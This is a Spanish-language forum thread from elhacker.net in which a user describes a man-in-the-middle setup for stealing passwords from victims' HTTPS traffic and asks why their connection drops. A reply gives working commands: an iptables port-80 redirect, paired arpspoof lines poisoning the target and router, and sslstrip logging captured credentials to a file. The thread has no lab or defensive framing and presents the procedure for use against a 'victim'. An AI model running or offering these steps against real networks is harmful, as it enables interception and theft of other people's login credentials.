Foro de elhacker.net

Mostraré los pasos que hago para poder sacar contraseñas protegidas por SSL, y el momento en el que se me desconecta internet (Luego tengo que reiniciar el pc, puesto que no vuelve a conectarse mas).

1) Pongo la maquina en modo ip_fordward = 1

2) Redireccion el trafico http del puerto 80 al 1000 con iptables

3)Corro sslstrip en el puerto 1000

4)Corro arpspoof

5)Corro ettercap
NOTA= agrego el -u para que no me cambie el ipforward a 0, ya que ettercap por defecto lo hace.

Este procedimiento lo hice en 2 lugares distintos, en uno conectados con un Router D-link DI-524.
Tuve el problema de que la victima se caía continuamente.

En el otro conectados con un modem inalambrico motorola SBG900, sin embargo en este apenas empiezo a correr ettercap, se me cae a mi el internet.

Datos importantes:

trabajo en debian 6, 2.6.32-5-686.
mi tarjeta de red es una Broadcom BCM4312.

nota 2 = no uso la tarjeta en modo monitor, ya que veo que en ocasiones mucho mejor en modo managed.

Muchas gracias

Te recomiendo que uses Wireshark:

http://cert.inteco.es/cert/Notas_Actualidad/informe_sobre_analisis_trafico_wireshark_20110211?postAction=getLatestInfo

Saludos.

Wireshark Ettercap...... ;-)

Hola!! en teoría, poniendo a 1 el ip_forward, no debería darte problemas, aún así, yo hago lo siguiente:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000

arpspoof -i interface -t iptarget iprouter
arpspoof -i interface -t iprouter iptarget

sslstrip -w fichero.txt

Si solo quieres passwords del protocolo https (protocolo SsL), no te hace falta ettercap, el mismo sslstrip te las almacena en 'fichero.txt'

Saludos ;)